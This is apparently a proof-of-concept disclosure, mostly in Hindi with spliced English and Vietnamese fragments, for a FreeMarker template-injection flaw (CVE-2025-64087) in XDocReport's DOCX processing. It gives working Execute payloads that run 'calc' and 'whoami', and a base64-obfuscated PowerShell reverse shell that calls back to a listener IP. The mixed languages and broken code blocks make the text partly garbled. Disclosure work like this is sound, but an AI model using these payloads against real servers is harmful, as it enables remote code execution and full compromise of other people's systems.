
CVE-2025-64087 (SSTI)
भेद्यता का अवलोकन
Server-Side Template Injection (SSTI) एक वेब सुरक्षा भेद्यता है जो हमलावरों को सामग्री प्रबंधन प्रणालियों (CMS) और वेब फ्रेमवर्क द्वारा उपयोग किए जाने वाले टेम्पलेट्स में दुर्भावनापूर्ण कोड इंजेक्ट करने की अनुमति देता है, ताकि दूरस्थ हमले किए जा सकें, संवेदनशील जानकारी प्राप्त की जा सके या सिस्टम में घुसपैठ की जा सके।
SSTI एक इंजेक्शन भेद्यता का एक प्रकार है (जैसे SQL Injection, XSS, आदि), जिसमें हैकर्स दूरस्थ रूप से दुर्भावनापूर्ण कोड तैनात करने के लिए टेम्पलेट सिस्टम के उपयोग का लाभ उठाते हैं। जब एक SSTI हमला सफलतापूर्वक किया जाता है, तो हैकर सर्वर-साइड पर अपना स्वयं का कोड निष्पादित कर सकता है, जिससे वे दूरस्थ हमले कर सकते हैं, जैसे संवेदनशील जानकारी एकत्र करना, सिस्टम में घुसपैठ करना, और अनधिकृत संसाधनों तक पहुंच बनाना।
SSTI भेद्यता अक्सर असुरक्षित टेम्पलेट सिस्टम के उपयोग के कारण होती है, या इनपुट मापदंडों को टेम्पलेट्स में डालने से पहले जांचने और संसाधित न करने के कारण होती है। यदि SSTI हमला सफलतापूर्वक किया जाता है, तो परिणाम गंभीर हो सकते हैं और हमलावर संगठन को बड़ा नुकसान हो सकता है।
व्यावसायिक प्रभाव
SSTI भेद्यता कई गंभीर परिणाम पैदा कर सकती है, जिनमें शामिल हैं:
दुर्भावनापूर्ण कोड निष्पादन: हमलावर इस भेद्यता का उपयोग सर्वर पर दुर्भावनापूर्ण कोड निष्पादित करने के लिए कर सकते हैं, जिससे डेटा चोरी, सिस्टम पर अवैध कार्य, और यहां तक कि सर्वर पर पूर्ण नियंत्रण संभव हो जाता है।
संवेदनशील जानकारी का खुलासा: SSTI हमलावर को सर्वर पर फ़ाइलों को पढ़ने, बदलने या हटाने की अनुमति दे सकता है। यदि इन फ़ाइलों में खाता नाम और पासवर्ड जैसी संवेदनशील जानकारी है, तो हमलावर आसानी से इस जानकारी का खुलासा कर सकता है।
उपयोगकर्ताओं को धमकी या धोखाधड़ी हमले: हमलावर SSTI का उपयोग करके वेबसाइट की सामग्री को बदलकर या नकली कस्टम बटन जोड़कर उपयोगकर्ताओं को धमकी या धोखाधड़ी के हमले कर सकता है। यदि उपयोगकर्ता इन बटनों पर क्लिक करते हैं, तो हमलावर उपयोगकर्ता की जानकारी चुरा सकता है या उनके कंप्यूटर पर मैलवेयर स्थापित कर सकता है।
A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the FreeMarker engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).
मानव संसाधन प्रबंधन वेबसाइट उपयोगकर्ताओं को सिस्टम पर .docx दस्तावेज़ फ़ाइल अपलोड करने की अनुमति देती है। प्रसंस्करण के दौरान, एप्लिकेशन FreeMarker टेम्पलेट इंजन (फ़ाइल FreemarkerTemplateEngine.java में) का उपयोग करके ${"freemarker.template.utility.Execute"?new()("whoami")} सामग्री को रेंडर करता है, बिना इनपुट सामग्री की जांच या फ़िल्टर करने के किसी तंत्र के।
यह भेद्यता हमलावर को .docx फ़ाइल (टेम्पलेट) में दुर्भावनापूर्ण अभिव्यक्तियाँ डालने की अनुमति देती है, जिससे सर्वर पर रिमोट कोड निष्पादन (RCE) होता है, और इसका उपयोग जानकारी चुराने या सिस्टम पर नियंत्रण प्राप्त करने के लिए किया जा सकता है।
fr.opensagres.xdocreport.template.freemarker — XDocReport (versions 1.0.0 through 2.1.0).
https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.freemarker/src/main/java/fr/opensagres/xdocreport/template/freemarker/FreemarkerTemplateEngine.java không thực hiện kiểm tra nội dung của file xdoc đầu vào.Nội dung template được nạp thẳng và chuyển vào process(context, writer, template) để xử lý bởi engine FreeMarker mà không có cơ chế sandboxing hoặc hạn chế directive/biểu thức. Kết quả là attacker có thể cung cấp template chứa biểu thức/dòng lệnh FreeMarker độc hại, dẫn đến thực thi mã từ xa (RCE)..docx फ़ाइल अपलोड करता है:```
${"freemarker.template.utility.Execute"?new()("calc")}
2. देखा गया कि सफलतापूर्वक निष्पादित किया जा सकता है और कैल्क एप्लिकेशन खोल सकता है

3. इसी प्रकार, सिस्टम पर चल रहे उपयोगकर्ता की जानकारी प्राप्त करने के लिए पेलोड के साथ:```
${"freemarker.template.utility.Execute"?new()("whoami")}
.docx फ़ाइल सिस्टम डेटा लौटा रही है।


6. प्रभाव को RCE तक बढ़ाएँ
- सुनने वाली मशीन wsl है जिसका IP पता `172.26.208.130` है

- निम्नलिखित payload के साथ शोषण करें:
```java
${"freemarker.template.utility.Execute"?new()("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAyADYALgAyADAAOAAuADEAMwAwACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==")}
.docx फ़ाइल को xdocreport द्वारा प्रोसेस करने के लिए दें